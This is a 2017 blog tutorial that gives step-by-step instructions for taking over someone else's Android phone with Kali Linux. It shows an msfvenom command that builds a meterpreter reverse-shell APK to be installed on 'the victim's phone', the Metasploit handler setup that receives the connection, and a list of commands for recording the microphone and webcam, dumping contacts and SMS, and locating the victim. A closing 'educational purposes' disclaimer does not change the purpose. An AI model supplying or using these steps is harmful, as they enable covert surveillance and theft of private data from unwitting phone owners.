Home » , , , , » HOW TO HACK ANY ANDROID DEVICE USING KALI

HOW TO HACK ANY ANDROID DEVICE USING KALI

Posted by Rom Flash Media on Saturday, January 28, 2017

Today in this tutorial we will be explaining you things about Kali Linux. Today’s topic is “How To Hack Any Android Device Using Kali “. Kali Linux is a very famous operating system that is being used by hackers. Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing.
To do this hack we are going to use two famous tools of Kali: MSF venom & Metasploit. MSF venom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. Metasploit is an open source penetration tool used for developing and executing exploit code against a remote target machine.

Requirements

Laptop/PC(with active internet connection).
Requires Kali 2.0

Step 1: Open Command Terminal in Kali and then write if config and hit enter. Now copy down the IP address that is written near it add and then close the command Terminal.
How To Hack Any Android Device Using Kali
How To Hack Any Android Device Using Kali
Step 2: Now Open the command Terminal Again and then write the Following Commands
msfvenom -p android/meterpreter/reverse_tcp LHOST=(IP ADDRESS) LPORT=4444 R >Shell.apk
Note: In the LOST Part write the IP Address that you had Copied earlier
Step 3: Now you will get to see an Apk file saved in Home Folder named as Shell.apk, All you have to do is just simply install the application on the victim’s phone.
How To Hack Any Android Device Using Kali
Step 4: Now Write the following command
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (IP ADDRESS)
set LPORT 4444
exploit
Note: Write The IP address in The LHOST PART that you had copied earlier. After writing each command hit enter.
 How To Hack Any Android Device Using Kali

Whenever the victim opens the app in his phone, meterpreter session will be established After that you can use the following hacking command

Hacking Commands:

record_mic
webcam_snap
webcam_stream
dump_contacts
dump_sms
geolocate
Whenever the victim opens the app in his phone, meterpreter session will be established After that you can use the following hacking command Hacking Commands: record_mic webcam_snap webcam_stream dump_contacts dump_sms geolocate
I Hope you Liked our Article for more Tech related stuff do, visit Trickz Buzz daily.
 
Disclaimer: Every Tutorial in Trickz Buzz is for Informational and Educational Purpose, Trickz Buzz and authors of the tutorials posted are not responsible for any loss.


0 comments:

Post a Comment

Popular Posts

Blog Archive

.comment-content a {display: none;}